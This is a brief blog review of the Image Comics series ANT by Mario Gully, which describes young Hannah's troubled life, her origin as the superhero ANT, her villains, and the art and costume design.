ANT created by: Mario Gully
Price: $ 3.99 US
Rating: 4 out of 5 stars
Website: www.imagecomics.com
Comments: The villians ANT faces are Randy Dandy, Pussyfoot, Yuck-It-Up, Quizmaster, and Half-Black and ANT is a action packed hero diving into these villians. Hannah a young girl is shown drawing ANT’s adventure. The villains she imagines are what you might expect from a young girl.
Hannah’s life growing up is a hard one. Her dad busy with work, her mother not in her life, and a bully harrassing her. Then things get really bad. As ANt is born in blood and death she is not someone you ever want to mess with.
The art showing ANT posing as an ant might is stunning. This origin is one amazing story wonderfully told.
This new series of ANT does make use of parts from the previous ones and improves on it. Hannah is starting her career as a super-hero and she has the right attitude. She is strong willed yet she used to be weak of body well not any more. Her new antennae are a deadly weapon. This new improved Hannah is ANT and evil better run.
The costume design makes use of black to hi-light the costume which does fit Hannah like a second skin. The visuals of it make it and ANT jump out at you.
ANT is a hero for those who need one.

Categories: Comic Book Blogs


Subscribe to Furiously Eclectic People aggregator